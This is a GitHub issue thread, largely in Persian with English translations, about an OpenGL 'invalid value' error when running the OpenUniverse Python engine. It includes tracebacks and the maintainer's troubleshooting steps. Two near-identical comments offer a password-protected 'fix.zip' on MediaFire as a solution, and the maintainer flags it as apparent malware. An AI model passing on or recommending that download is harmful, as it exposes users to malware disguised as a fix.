### ISSUE TITLE
مشکل در اجرای بازی

### ISSUE THREAD

**Issue by amirhoseini1385** [MatinAfzal/OpenUniverse#5]
من بعد از اجرای موتور با cmd این خطا رو دریافت میکنم

C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main>python OpenUniverse.py
pygame 2.5.2 (SDL 2.28.3, Python 3.11.4)
Hello from the pygame community. https://www.pygame.org/contribute.html
---------------------------------------------------------------------

     ___ ___ ___
   /___/___/___/|
  /___/___/___/||
 /___/___/__ /|/|
|   |   |   | /||
|___|___|___|/|/|
|   |   |   | /||
|___|___|___|/|/
|   |   |   | /
|___|___|___|/
    OpenUniverse V1.8.8-beta

Project repo: https://github.com/MatinAfzal/OpenUniverse
Starting Engine...
Starting at:2024-08-26 02:20:03.086770

    OpenUniverse Control Guide:
        movement: w - a - s - d
        yaw & pitch: mouse
        world main axes: x  (0.3 second interrupt)
        face culling: c     (0.3 second interrupt)
        view mode: v        (GL_POINTS, GL_LINES, GL_TRIANGLES) (0.3 second interrupt)
        camera info: z      (1 second interrupt)
        light control: l    (Pause, Grab, PLace, Continue) (0.3 second interrupt)
        memory info: m      (1 second interrupt)
        live debugger: F3   (UNAVAILABLE V1.2.3-beta)
        builder mode: b     (0.3 second interrupt)
            - Change block: MouseRightClick
            - Place Block: MouseLeftClick
            - Distance: MouseScroll

---Begin of ENGINE_STATUS_PRINT (ESP) logs---
Attaching Objects...
Attaching Objects...
Building Trees (Multiple Level.Trees Callings) at 2024-08-26 02:20:03.823286...
Building Chunks (Multiple Level.Chunk Callings) at 2024-08-26 02:20:03.823286...
Building Trees ended at 2024-08-26 02:20:05.315899...
Building Chunks ended at 2024-08-26 02:20:13.413446...
Loading Screen...
Loading Files...
Loading Shaders...
creating Program...
Compile Program...
Compile Program...
Program Created, program_id:  3
creating Program...
Compile Program...
Compile Program...
Program Created, program_id:  6
Loading Entities...
Loading Axes...
Building Mesh...
Loading light...
Loading Camera...
Loading Objects...
Building Mesh...
Traceback (most recent call last):
  File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 431, in <module>
    MultiShaders().mainloop()
    ^^^^^^^^^^^^^^
  File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 128, in __init__
    self.cube0 = LoadObject(
                 ^^^^^^^^^^^
  File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\LoadObject.py", line 40, in __init__
    super().__init__(vertices,
  File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\Mesh.py", line 55, in __init__
    colors.create_variable(self.material.program_id, "vertex_color")
  File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\DataHandler.py", line 22, in create_variable
    glVertexAttribPointer(variable_id, 3, GL_FLOAT, False, 0, None)
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 63, in __call__
    return self.wrapperFunction( self.baseFunction, *args, **named )
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\GL\VERSION\GL_2_0.py", line 470, in glVertexAttribPointer
    return baseOperation(
           ^^^^^^^^^^^^^^
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 43, in __call__
    return self._finalCall( *args, **named )
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 700, in wrapperCall
    raise err
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 693, in wrapperCall
    result = wrappedOperation( *cArguments )
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\error.py", line 230, in glCheckError
    raise self._errorClass(
OpenGL.error.GLError: GLError(
        err = 1281,
        description = b'invalid value',
        baseOperation = glVertexAttribPointer,
        pyArgs = (
                -1,
                3,
                GL_FLOAT,
                False,
                0,
                c_void_p(None),
        ),
        cArgs = (
                -1,
                3,
                GL_FLOAT,
                False,
                0,
                c_void_p(None),
        ),
        cArguments = (
                -1,
                3,
                GL_FLOAT,
                False,
                0,
                c_void_p(None),
        )
)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MatinAfzal** [comment]
امیر حسین عزیز، لطفا هرچه سریع تر به سرور دیسکورد ما مراجعه کنید و ابدا هیچ برنامه ای رو بر روی کامپیوترتون نصب نکنید! ⚠️⚠️⚠️

MatinAfzalAsr 
 
  On Mon, 26 Aug 2024 at 12:53, ***@***.***> wrote:   


من بعد از اجرای موتور با cmd این خطا رو دریافت میکنم

C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main>python OpenUniverse.py
pygame 2.5.2 (SDL 2.28.3, Python 3.11.4)
Hello from the pygame community. https://www.pygame.org/contribute.html
 ___ ___ ___

////|
////||
///__ /|/|
| | | | /||
||||/|/|
| | | | /||
||||/|/
| | | | /
|||___|/
OpenUniverse V1.8.8-beta

Project repo: https://github.com/MatinAfzal/OpenUniverse
Starting Engine...
Starting at:2024-08-26 02:20:03.086770
OpenUniverse Control Guide:
    movement: w - a - s - d
    yaw & pitch: mouse
    world main axes: x  (0.3 second interrupt)
    face culling: c     (0.3 second interrupt)
    view mode: v        (GL_POINTS, GL_LINES, GL_TRIANGLES) (0.3 second interrupt)
    camera info: z      (1 second interrupt)
    light control: l    (Pause, Grab, PLace, Continue) (0.3 second interrupt)
    memory info: m      (1 second interrupt)
    live debugger: F3   (UNAVAILABLE V1.2.3-beta)
    builder mode: b     (0.3 second interrupt)
        - Change block: MouseRightClick
        - Place Block: MouseLeftClick
        - Distance: MouseScroll

---Begin of ENGINE_STATUS_PRINT (ESP) logs---
Attaching Objects...
Attaching Objects...
Building Trees (Multiple Level.Trees Callings) at 2024-08-26 02:20:03.823286...
Building Chunks (Multiple Level.Chunk Callings) at 2024-08-26 02:20:03.823286...
Building Trees ended at 2024-08-26 02:20:05.315899...
Building Chunks ended at 2024-08-26 02:20:13.413446...
Loading Screen...
Loading Files...
Loading Shaders...
creating Program...
Compile Program...
Compile Program...
Program Created, program_id: 3
creating Program...
Compile Program...
Compile Program...
Program Created, program_id: 6
Loading Entities...
Loading Axes...
Building Mesh...
Loading light...
Loading Camera...
Loading Objects...
Building Mesh...
Traceback (most recent call last):
File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 431, in 
MultiShaders().mainloop()
^^^^^^^^^^^^^^
File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 128, in init
self.cube0 = LoadObject(
^^^^^^^^^^^
File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\LoadObject.py", line 40, in init
super().init(vertices,
File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\Mesh.py", line 55, in init
colors.create_variable(self.material.program_id, "vertex_color")
File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\DataHandler.py", line 22, in create_variable
glVertexAttribPointer(variable_id, 3, GL_FLOAT, False, 0, None)
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 63, in call
return self.wrapperFunction( self.baseFunction, *args, **named )
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\GL\VERSION\GL_2_0.py", line 470, in glVertexAttribPointer
return baseOperation(
^^^^^^^^^^^^^^
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 43, in call
return self._finalCall( *args, **named )
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 700, in wrapperCall
raise err
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 693, in wrapperCall
result = wrappedOperation( *cArguments )
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\error.py", line 230, in glCheckError
raise self._errorClass(
OpenGL.error.GLError: GLError(
err = 1281,
description = b'invalid value',
baseOperation = glVertexAttribPointer,
pyArgs = (
-1,
3,
GL_FLOAT,
False,
0,
c_void_p(None),
),
cArgs = (
-1,
3,
GL_FLOAT,
False,
0,
c_void_p(None),
),
cArguments = (
-1,
3,
GL_FLOAT,
False,
0,
c_void_p(None),
)
)

**Comment by MatinAfzal** [comment]
> من بعد از اجرای موتور با cmd این خطا رو دریافت میکنم
> 
> ## C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main>python OpenUniverse.py
> pygame 2.5.2 (SDL 2.28.3, Python 3.11.4)
> Hello from the pygame community. https://www.pygame.org/contribute.html
> ```
>  ___ ___ ___
> ```
> 
> /_**/**_/_**/| /**_/_**/**_/|| /_**/**_/__ /|/| | | | | /|| |_**|**_|_**|/|/| | | | | /|| |**_|_**|**_|/|/ | | | | / |_**|**_|___|/ OpenUniverse V1.8.8-beta
> 
> Project repo: https://github.com/MatinAfzal/OpenUniverse Starting Engine... Starting at:2024-08-26 02:20:03.086770
> 
> ```
> OpenUniverse Control Guide:
>     movement: w - a - s - d
>     yaw & pitch: mouse
>     world main axes: x  (0.3 second interrupt)
>     face culling: c     (0.3 second interrupt)
>     view mode: v        (GL_POINTS, GL_LINES, GL_TRIANGLES) (0.3 second interrupt)
>     camera info: z      (1 second interrupt)
>     light control: l    (Pause, Grab, PLace, Continue) (0.3 second interrupt)
>     memory info: m      (1 second interrupt)
>     live debugger: F3   (UNAVAILABLE V1.2.3-beta)
>     builder mode: b     (0.3 second interrupt)
>         - Change block: MouseRightClick
>         - Place Block: MouseLeftClick
>         - Distance: MouseScroll
> ```
> 
> ---Begin of ENGINE_STATUS_PRINT (ESP) logs--- Attaching Objects... Attaching Objects... Building Trees (Multiple Level.Trees Callings) at 2024-08-26 02:20:03.823286... Building Chunks (Multiple Level.Chunk Callings) at 2024-08-26 02:20:03.823286... Building Trees ended at 2024-08-26 02:20:05.315899... Building Chunks ended at 2024-08-26 02:20:13.413446... Loading Screen... Loading Files... Loading Shaders... creating Program... Compile Program... Compile Program... Program Created, program_id: 3 creating Program... Compile Program... Compile Program... Program Created, program_id: 6 Loading Entities... Loading Axes... Building Mesh... Loading light... Loading Camera... Loading Objects... Building Mesh... Traceback (most recent call last): File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 431, in MultiShaders().mainloop() ^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\OpenUniverse.py", line 128, in **init** self.cube0 = LoadObject( ^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\LoadObject.py", line 40, in **init** super().**init**(vertices, File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\Mesh.py", line 55, in **init** colors.create_variable(self.material.program_id, "vertex_color") File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\Engine2\DataHandler.py", line 22, in create_variable glVertexAttribPointer(variable_id, 3, GL_FLOAT, False, 0, None) File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 63, in **call** return self.wrapperFunction( self.baseFunction, *args, **named ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\GL\VERSION\GL_2_0.py", line 470, in glVertexAttribPointer return baseOperation( ^^^^^^^^^^^^^^ File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\latebind.py", line 43, in **call** return self._finalCall( *args, **named ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 700, in wrapperCall raise err File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\wrapper.py", line 693, in wrapperCall result = wrappedOperation( *cArguments ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\AppData\Local\Programs\Python\Python311\Lib\site-packages\OpenGL\error.py", line 230, in glCheckError raise self._errorClass( OpenGL.error.GLError: GLError( err = 1281, description = b'invalid value', baseOperation = glVertexAttribPointer, pyArgs = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ), cArgs = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ), cArguments = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ) )

Dear Amir Hossein, thank you for your presence in the project and for opening this issue. I will try to solve your problem.

First, before my answer, you may have come across two comments from two other users on GitHub that invite you to install the program from a link to solve the problem. Still, according to the information in this [link](https://any.run/report/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a/1f3b42b6-9353-46c5-bdcd-35a8e0d9991c), it may be important information. May you be dangerous! If you install this app, please visit our Discord immediately! 🛑

In the next step, I would like you to send the specifications of your system (CPU model, amount of RAM, operating system, graphics card model) along with ESP Logs so that I can guide you better.

---

امیر حسین عزیز ممنون از حضور شما در پروژه و افتتاح این شماره. من سعی می کنم مشکل شما را حل کنم.

در مرحله اول، قبل از پاسخ من، ممکن است با دو نظر از دو کاربر دیگر در GitHub مواجه شده باشید که شما را به نصب برنامه از یک لینک برای حل مشکل دعوت می کند، اما با توجه به اطلاعات [این لینک](https://any.run/report/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a/1f3b42b6-9353-46c5-bdcd-35a8e0d9991c) ممکن است اطلاعات مهم باشد شما ممکن است خطرناک باشید! اگر این برنامه را نصب کردید، لطفاً فوراً به Discord ما مراجعه کنید! 🛑

در مرحله بعد از شما می خواهم مشخصات سیستم خود (مدل سی پی یو، میزان رم، سیستم عامل، مدل کارت گرافیک) را به همراه ESP Logs بفرستید تا بهتر راهنماییتان کنم.

**Comment by MatinAfzal** [comment]
من در ادامه لیست کاملی از راه حل ها را برای برطرف کردن مشکلتون ارائه میدم.

- **مسیر اشتباه**
با توجه به مسیری که دارید برنامه رو اجرا میکنید:
C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main>
به نظر میرسد که شما فایل دانلود شده را به درستی استخراج نکرده اید! دقت کنید که بعد از دانلود OpenUniverse شما باید فایل را اکسترکت کرده و مسیر فایل شما باید مشابه این مسیر باشد:
C:\Users\amirh\Downloads\OpenUniverse-1.8.8-beta\main>

- **استفاده از محیط ها**
پیشنهاد میکنم برای جلوگیری از عدم همپوشانی نیازمندی های اجرا برای پروژه یک محیط ایجاد کنید
اموزشات لازم را میتوانید در اینجا پیدا کنید:
https://it.engineering.oregonstate.edu/setting-virtual-environments-python

- **نصب درست نیازمندی ها**
ممکن است مشکل از اختلاف ورژن کتابخانه های مورد نیاز باشد، پیشنهاد میشود نیازمندی هارا با استفاده از دستور:
pip install -r /path/to/OpenUniverse/requirements.txt
بر روی محیط نصب کنید.

- **اجرا با دسترسی ادمین**
دقت کنید که OpenUniverse در حالت عادی نیاز به این دسترسی ندارد اما اگر از پیکر بندی های خاصی بر روی سیستم خود استفاده میکنید میتوانید قبل از اجرا CMD را با دسترسی Admin باز کنید.

- **سخت افزار لازم**
توجه داشته باشید برای اجرا OpenUniverse باید حداقل از 2.5 گیگابایت Vram کارت گرافیک (به بالا) و بیش از 16 گیگابایت RAM (برای حالت ایده آل)  پشتیبانی کنید.

در نظر داشته باشید که طبق اطلاعات داده شده در صفحه readme پروژه، OpenUniverse یک بازی نیست! 

در صورت برطرف نشدن مشکل، اطلاعات سخت افزار ماشینتون رو به همراه ESP Logs در اختیار ما بگذارید ❤️

---

I am providing a complete list of solutions to address your issue:

- Incorrect Path: Based on the path you are running the program from: C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main> It seems that you have not extracted the downloaded file correctly! Make sure that after downloading OpenUniverse, you extract the file and the path should look like this: C:\Users\amirh\Downloads\OpenUniverse-1.8.8-beta\main>

- Using Virtual Environments: To avoid conflicts with dependencies, it is recommended to create a virtual environment. You can find the necessary instructions here: Setting up virtual environments in Python

- Proper Installation of Dependencies: The issue might be due to version conflicts of required libraries. It is recommended to install the dependencies using the following command: pip install -r /path/to/OpenUniverse/requirements.txt

- Running with Admin Privileges: Note that OpenUniverse does not usually require admin privileges, but if you have specific configurations on your system, you can open CMD with admin privileges before running the program.

- Hardware Requirements: Ensure that your system meets the minimum hardware requirements: at least 2.5 GB of VRAM on the graphics card and more than 16 GB of RAM for optimal performance.

Please note that according to the project’s README, OpenUniverse is not a game!
If the issue persists, please provide your hardware specifications along with ESP logs. ❤️

**Comment by amirhoseini1385** [comment]
سلام
مشخصات سیستم من به این صورت هست
Intel(R) Core(TM) i7-8665U CPU @ 1.90GHz   2.11 GHz
8GB ddr4
گرافیک انبرد و تا 6 گیگ شیر میشه

**Comment by amirhoseini1385** [comment]
یعنی واقعا برای اجرای این انجین من باید انقدر سیستمم قوی باشه یا خدا

**Comment by MatinAfzal** [comment]
> سلام مشخصات سیستم من به این صورت هست Intel(R) Core(TM) i7-8665U CPU @ 1.90GHz 2.11 GHz 8GB ddr4 گرافیک انبرد و تا 6 گیگ شیر میشه

مشخصات سیستمتون برای اجرا کردن موتور کافیه، در نظر داشته باشید که  با هر مشخصاتی باید بتونید موتور رو اجرا کنید و فقط در صورت نداشتن سخت افزار لازم ممکنه با کمی افت FPS مواجه بشید، ایا تمامی راه های توضیح داده شده رو امتحان کردید؟

**Comment by MatinAfzal** [comment]
> یعنی واقعا برای اجرای این انجین من باید انقدر سیستمم قوی باشه یا خدا

دقت کنید که این پروژه در وضعیت beta قرار داره و قطعا نباز به تغییرات زیادی داره اما 2GB مقدار VRAM نیاز به سیستم قدرتمندی نداره، میتونید از داخل فایل Settings2.py مقدار TREE و  CHUNK ها رو کمتر کنید.

**Comment by MatinAfzal** [comment]
> ## سلام من از محیط استفاده کردم و تمام نیازمندی هارو با فایل requirements.txt نصب کردم اما مشکل من هنوز برطرف نشده و هنوز پابرجا هست
> من فایل رو به درستی اکسترکت کردم و دلیل مسیر فایل این هست که با دانلود منیجر دانلود کردم و فایل فشرده داخل پوشه compressed ذخیره شده
> (openu) C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu>python OpenUniverse.py
> pygame 2.5.2 (SDL 2.28.3, Python 3.11.4)
> Hello from the pygame community. https://www.pygame.org/contribute.html
> ```
>  ___ ___ ___
> ```
> 
> /_**/**_/_**/| /**_/_**/**_/|| /_**/**_/__ /|/| | | | | /|| |_**|**_|_**|/|/| | | | | /|| |**_|_**|**_|/|/ | | | | / |_**|**_|___|/ OpenUniverse V1.8.8-beta
> 
> Project repo: https://github.com/MatinAfzal/OpenUniverse Starting Engine... Starting at:2024-08-28 01:41:23.142926
> 
> ```
> OpenUniverse Control Guide:
>     movement: w - a - s - d
>     yaw & pitch: mouse
>     world main axes: x  (0.3 second interrupt)
>     face culling: c     (0.3 second interrupt)
>     view mode: v        (GL_POINTS, GL_LINES, GL_TRIANGLES) (0.3 second interrupt)
>     camera info: z      (1 second interrupt)
>     light control: l    (Pause, Grab, PLace, Continue) (0.3 second interrupt)
>     memory info: m      (1 second interrupt)
>     live debugger: F3   (UNAVAILABLE V1.2.3-beta)
>     builder mode: b     (0.3 second interrupt)
>         - Change block: MouseRightClick
>         - Place Block: MouseLeftClick
>         - Distance: MouseScroll
> ```
> 
> ---Begin of ENGINE_STATUS_PRINT (ESP) logs--- Attaching Objects... Attaching Objects... Building Trees (Multiple Level.Trees Callings) at 2024-08-28 01:41:23.681246... Building Trees ended at 2024-08-28 01:41:23.702697... Building Chunks (Multiple Level.Chunk Callings) at 2024-08-28 01:41:23.807416... Building Chunks ended at 2024-08-28 01:41:24.222307... Loading Screen... Loading Files... Loading Shaders... creating Program... Compile Program... Compile Program... Program Created, program_id: 3 creating Program... Compile Program... Compile Program... Program Created, program_id: 6 Loading Entities... Loading Axes... Building Mesh... Loading light... Loading Camera... Loading Objects... Building Mesh... Traceback (most recent call last): File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\OpenUniverse.py", line 431, in MultiShaders().mainloop() ^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\OpenUniverse.py", line 128, in **init** self.cube0 = LoadObject( ^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Engine2\LoadObject.py", line 40, in **init** super().**init**(vertices, File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Engine2\Mesh.py", line 55, in **init** colors.create_variable(self.material.program_id, "vertex_color") File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Engine2\DataHandler.py", line 22, in create_variable glVertexAttribPointer(variable_id, 3, GL_FLOAT, False, 0, None) File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\latebind.py", line 63, in **call** return self.wrapperFunction( self.baseFunction, *args, **named ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\GL\VERSION\GL_2_0.py", line 470, in glVertexAttribPointer return baseOperation( ^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\latebind.py", line 43, in **call** return self._finalCall( *args, **named ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\wrapper.py", line 700, in wrapperCall raise err File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\wrapper.py", line 693, in wrapperCall result = wrappedOperation( *cArguments ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu\Lib\site-packages\OpenGL\error.py", line 230, in glCheckError raise self._errorClass( OpenGL.error.GLError: GLError( err = 1281, description = b'invalid value', baseOperation = glVertexAttribPointer, pyArgs = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ), cArgs = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ), cArguments = ( -1, 3, GL_FLOAT, False, 0, c_void_p(None), ) )
> 
> (openu) C:\Users\amirh\Downloads\Compressed\OpenUniverse-1.8.8-beta\OpenUniverse-1.8.8-beta\main\openu>

امیر حسین عزیز در اولین مرحله خیلی ممنونیم که با اشتراک گذاری مشکلتون به با کیفیت تر شدن جامعه ما کمک میکنید.

ما با بررسی خروجی برنامه و مشخصات سخت افزاری که برای ما ارسال کردید متوجه شدیم که مشکل (تا حدودی) مربوط به OpenUniverse است، در واقع پیکر بندی هایی که در لایه های عمیق موتور انجام شده است ممکن است ( در بعضی از سخت افزار های خاص ) این خطا را در هنگام اجرای موتور نمایش دهد!

این مشکل میتواند از به روز نبودن درایور های مختلف، استفاده از برنامه هایی که پیکر بندی عادی گرافیک شما را تغییر میدهند و استفاده از ترکیبات سخت افزاری ناهمخوان نشات گرفته باشد.

ما همواره تلاش میکنیم تا در اینده با انتشار نسخه های بروز تر این مشکل را برطرف کنیم و شرایط را به گونه ای تغییر دهیم که OpenUniverse بر روی ترکیبات سخت افزاری بیشتری همپوشانی داشته باشد.

شما میتوانید برای برطرف شدن این مشکل راه های زیر را امتحان کنید:

- از این لینک نسبت به نصب gcc. کامپایلر اقدام کنید https://gcc.gnu.org/install

- از System File Checker نسبت به پیدا کردن فایل های خراب سیستمی خود استفاده کنید.

- درایور کارت گرافیک خود را بروز کنید.

- از تنظیمات دیفالت درایور ها استفاده کنید.

ما متوجه شدیم که این مشکل بیشتر از لبتاپ ها و یا کارت های گرافیک خاص نشات میگیرد، اگر راه های بالا را امتحان کردید و مشکل برطرف نشد لطفا منتظر بمانید تا ما این مشکل را برطرف کنیم، همچنین ممنون میشیم جهت شفاف تر شدن ریشه ی خطا (نوع و مدل دقیق کارت گرافیک) خود را در اختیار ما بگذارید. ❤️

---

Amir Hossein, thank you very much for sharing your issue with us. Your contribution helps improve our community’s quality.

After reviewing the program output and the hardware specifications you provided, we’ve identified that the issue (to some extent) is related to OpenUniverse. Specifically, configurations made in the deeper layers of the engine may cause this error during execution, particularly on certain specific hardware setups.

This problem could arise from various factors, including outdated drivers, third-party programs that alter your graphics configuration, or hardware combinations that are incompatible.

Rest assured that we continuously work to address such issues in future updates. Our goal is to make OpenUniverse more compatible with a wider range of hardware configurations.

In the meantime, you can try the following steps to mitigate the problem:

- Install GCC Compiler: You can follow this link to install the GCC compiler: https://gcc.gnu.org/install.
- Use System File Checker: Run the System File Checker (SFC) to identify any corrupted system files.
- Update Graphics Drivers: Ensure that your graphics card drivers are up to date.
- Use Default Driver Settings: Consider using default driver settings rather than custom configurations.

We’ve noticed that this issue occurs more frequently on laptops or specific graphics cards. If you’ve tried the above steps and the problem persists, please stay tuned—we’re actively working on resolving this issue. Additionally, providing more details about the exact type and model of your graphics card would be greatly appreciated! ❤️

**Comment by amirhoseini1385** [comment]
در دفعه سوم که تابع create_variable از کلاس DataHandler اجرا میشه متغیر variable_id  برابر میشه با -1 و باعث خطا میشه و نمیتونه متغیر vertex_color رو دریافت کنه ، من در opengl تجربه زبادی ندارم و میخواستم ازتون بپرسم ایا دلیل خاصی داره که کد نمیتونه این متغیر رو پیدا کنه؟

**Comment by BaranSh28** [comment]
salam khaste nabashin.. bebakhshid man vaghti code o run mikonam lib e engine2 ro import nemikone.. tu packageaye pycharm am nistesh , chika konam ?

**Comment by amirhoseini1385** [comment]
داداش اینجا که نباید بپرسی باید یه issue جدید بسازی

**Comment by MatinAfzal** [comment]
> salam khaste nabashin.. bebakhshid man vaghti code o run mikonam lib e engine2 ro import nemikone.. tu packageaye pycharm am nistesh , chika konam ?

وقت بخیر، issue مربوط به خودتون رو با عنوان مناسب ایجاد کنید و مشکلتون رو به زبان (فارسی/انگلیسی) شرح بدید تا راهنمایی صورت بگیره و سایر دوستان نیز بتونن مطالعه کنند.

**Comment by BaranSh28** [comment]
> داداش اینجا که نباید بپرسی باید یه issue جدید بسازی

Albate man dadash nistam , khaharam ..vali merc..moshkel hal shod

**Comment by BaranSh28** [comment]
> > salam khaste nabashin.. bebakhshid man vaghti code o run mikonam lib e engine2 ro import nemikone.. tu packageaye pycharm am nistesh , chika konam ?
> 
> وقت بخیر، issue مربوط به خودتون رو با عنوان مناسب ایجاد کنید و مشکلتون رو به زبان (فارسی/انگلیسی) شرح بدید تا راهنمایی صورت بگیره و سایر دوستان نیز بتونن مطالعه کنند.

Mamnunam moshkel hal shod

**Comment by amirhoseini1385** [comment]
ببخشید نمیتونید پروژه رو به صورت داکرایز شده هم بزارید تا افرادی که مثل من مشکل دارن بتونن اون رو اجرا کنن و تمام پیشنیاز ها درست باشه؟
